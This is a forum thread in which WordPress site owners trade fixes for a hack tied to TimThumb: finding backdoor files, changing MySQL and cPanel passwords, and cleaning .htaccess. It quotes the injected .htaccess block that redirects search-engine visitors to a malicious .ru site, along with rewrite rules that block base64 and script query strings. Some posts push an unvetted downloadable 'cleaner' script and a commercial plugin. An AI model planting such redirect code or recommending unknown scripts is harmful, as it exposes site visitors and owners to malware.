I have been well and truly Hacked

Yeah, it’ll be a lengthy process… I have about 10 wordpress sites that’ll have be be checked.

I’m never offering to host a friend’s site again! ha.

I had 20. Took me about 4-5 hours in all. The longest part was the backup.

I would also recommend changing all the MySQL passwords at once and then loading the wp-config.php files one by one and checking that the corresponding site goes live again in between.

Okay, sorry to ask more questions. Just wanting to make sure I understand and do it right…

1) When you are changing the mySQL passwords, that is not connected to the wordpress user passwords correct? As in, I won’t need to send every user the new password? (i’ve never done much with sql databases)

2) How much do I need to pay you to fix mine? haha

Thanks, and i’ll prob have more questions once I start, which probably won’t be until Friday.

Thanks man for the info.

1) No. It’s the database that WordPress uses to store pretty much all info (pages, posts, users, etc.) so it’s vital. That database has a password, which isn’t associated with WordPress whatsoever. If everything is done properly, everything will stay the same. You just have to change your MySQL password first, and then switch out that wp-config.php to contain your new password for the MySQL database.

2) Haha. I’d do it on the cheap but am more than happy to answer questions you have along the way.

[email protected] if you want to talk about me doing it.

Guys I can’t tell you how mad I was when I got all my sites hacked. I have tried about 4 different scripts to repair them until I came across this one. Just drop it in your domains root folder and then navigate to it https://www.domainname.com/cleaner-cli_2.4.php and hit return and just wait. It will take about 3 minutes or so depending on the size of your site. But it went through and cleaned the hack code off every file on my site. I have ran it 8 times now with no issues and it has gotten every file. You can find it here https://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html just scroll down and download it. I am thinking about sending this guy money for the time he has saved me. Feel free to contact me if you need help with it.

I just ran the cleaner-cli_2.4.php script (took about 30 minutes) but the malicious code is still there. Didn’t work for me.

I’ll be giving charlesmkelley’s solutions a try later this afternoon/night and will get back to y’all once i’ve given that a whirl.

Charles,

I started with your tutorial on how to fix this problem but have a couple questions as i’m going…

I ran a scan of my backup files using Microsoft Security Essentials and it found 1 file, “Backdoor:php/shell.f” – Is that what i’ll be searching for in my backup?

Also, in Step 4 you say you searched the files from your backup using Dreamweaver, how did you search all of the files?

Hi try the cloudsafe365_for_WP plugin it stops and reports hacking and content theft (Scraping)44.

The main issue to stop the hacker from getting in to the site in the first place cloudsafe365_for_WP does exactly that Stops a hacker and scraper cold and reports on there activity.

It also backs up your data and encrypts it and stores it in several secure locations. cloudsafe365 is a Amazon solutions partner.

contact me [email protected] or visit the website https://www.cloudsafe365.com.

If you need more information contact me…

[email protected]

I Downloaded my backup, scanned it using Microsoft Security Essentials (via Parallels for Mac) and found the backdoor file in the form of a .cache file in my uploads folder. I deleted that file, restored the .htaccess file in my public html folder.

I then installed and activated the BulletProof Security plugin to every site. This cleaned all .htaccess files.

So far (it’s been just over an hour) the sites are still clean and the .htaccess files are still clean. I will check back later tonight and if all is still good I will continue with changing all MySQL passwords.

THIS METHOD HAS BEEN WORKING FOR ME FOR 3 DAYS!!! ITS FINALLY GONE!!!

TO fix website malware issues: SUGGESTION: CHANGE ALL CPANEL & FTP ACCOUNT PASSWORDS then PROCEED (not the database passwords or wordpress installions) ONLY MAIN ACCOUNT AND FTP PASSWORDS

1.Update to Latest version of WordPress on each website installations (WordPress 3.3.1)

2.Add Plugin TimThumb Vulnerability Scanner to each website -Activate Plugin, Run/Scan
If it finds updates for you, check the updates and tell it to update.

3. Now locate any files on your server that stand out like (dhauei_cache.php), (ausdhuddeee.php) – I would say that its safe to delete these files immediately!!! But continue deleting files at ur own risk. Use ur own judgement or even take a look at the coding inside. do this for each seperate website (normally these files will be found on the root of each website (ex.yourdomain.com/dhauei_cache.php) But some may be found in other folders like:

/public_html/wp-content/uploads/_cache.php
/public_html/***/wp-includes/unzip.php
/public_html/*********/wp-includes/unzip.php
/public_html/*********/wp-content/uploads/_wp_cache.php
/www/wp-content/uploads/_cache.php
/www/*********/wp-includes/unzip.php
/www/*********/wp-content/uploads/_wp_cache.php

YOU NEED TO DELETE THESE FILES NOT THE DIRECTORIES/FOLDERS!!!!

4. Now go to your cpanel, locate home/yourservername/.htaccess (u should have access to this file) select and click on change permissions (change from 444 to 644) click ok
Next click on the same file and hit EDIT

If u know what ur doing, add this code to the top of the .htaccess file

Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*iframe.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index_error.php [F,L]
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* – [F]

—-THEN SCROLL THRU AND REMOVE ALL OTHER CODES THAT LOOK LIKE THIS BELOW———REMEMBER DELETE THE STUFF LIKE BELOW——-

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ https://saveprefs .ru/astro/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ https://saveprefs .ru/astro/index.php [R=301,L]
</IfModule>

—–YOU MAY HAVE TO SCROLL THROUGH THE ENTIRE FILE BECAUSE SOMETIMES THE OTHER MALICIOUS CODES WILL BE AT THE BOTTOM—

ONCE YOUR DONE TAKING OUT ALL THE GARBAGE, THEN U CAN CLICK ON SAVE FILE….NOW THERE SHOULD BE A .htaccess in each seperate website you own. If you come to a .htaccess thats already (cmod 644) -CHANCES ARE ITS NOT AFFECTED SO U CAN VIEW THE FILE BY CLICKING EDIT, THEN ADDING THE LINES OF TEXT TO THE .HTACCESS OF EACH AND EVERY INDIVIDUAL WEBSITE (REMEMBERING TO CMOD 644 EACH UNLESS THEY ARE ALREADY CMODDED TO 644.

NOTE IF YOU HAVE A WORDPRESS INSTALLATION INSIDE A FOLDER (EX. yourdomain.com/wpblog/.htaccess) THEN YOU WILL NOT HAVE TO ADD THE LINE OF CODE TO THAT .HTACCESS FILE. REASON FOR THIS IS BECAUSE THE MALWARE HAS ONLY AFFECTED DIRECT ROOT FOLDERS
(ex. yourdomain1.com/.htaccess, yourdomain2.com/.htaccess, yourdomain3.com/.htaccess )

ONCE YOUR’RE DONE EDITING AND SAVING THE .HTACCESS FILES (DEPENDING ON HOW MANY SITES YOU HOST) -YOUR’RE DONE

SCAN YOUR WEBSITE WITH THE FOLLOWING FREE TOOL: https://sitecheck.sucuri.net/

YOUR SITE SHOULD COME BACK CLEAN AND FREE OF MALWARE!!!!!! Compliments of RCBUX.COM

Ey, guys! I have cleaned 2 of my 7 websites tonight following your steps (Microsoft Security Esentials, installed BulletProof Security and installed also another wordpress security plugin) and they work ok! Thankyou so much! I had this problem since a few months ago and now just finished! ?? You’re all angels! hahahaha

@chris – Sorry for the delay. You can search an entire folder via Dreamweaver’s search/replace tool. I just searched the source source code in a folder for the terms mentioned above which was the malicious code that MSE picked up originally. I found more than what MSE had actually picked up though as I mentioned. Also, I mentioned cleaning up the SQL passwords first because, if you don’t, whoever pushed this code to your site would still have your password to every single WordPress databse you have despite you cleaning up the files, etc. It’s a more secure process if you delete the malicious files first and foremost, then change those MySQL passwords, CPanel Passwords, etc, and upload new wp-config.php files to assure they have ZERO access to anything your site, then reload defualt .htaccess files into each root directory to assure you’re site isn’t going to the .ru site anymore.

@boyxinfo – Dead wrong. You definitely want to change your database/MySQL passwords. The malicious code specifically pulls everything from your site that contains those passwords (i.e. wp-config.php, etc.) That means, as I mentioned above, despite you changing your cpanel and ftp password, they still could potentially gain access to your mysql database should you not find all the files. Also, just simply “looking” for the file on a large hosting package like mine with 20 installs could hours if not days (I had 66,000+ files to scan through). You should use already-existing tools, like MSE, as a starting point to search for such malicious code as I mentioned or else it’s really pointless as you’re bound to miss something and the code still be there. Also, how about some credit to me for the fix? Don’t try to own up to what I found.

@upango – Glad to help. Hope everything works out okay. Mine’s been going strong for about 3 days now. You may or may not have, but fon’t forgot to scan for the TimThumb vulnerability (how this hack got on your site in the first place), update any instance of TimThumb on your server, and update your WordPress installation(s) to secure against any further vulnerabilities.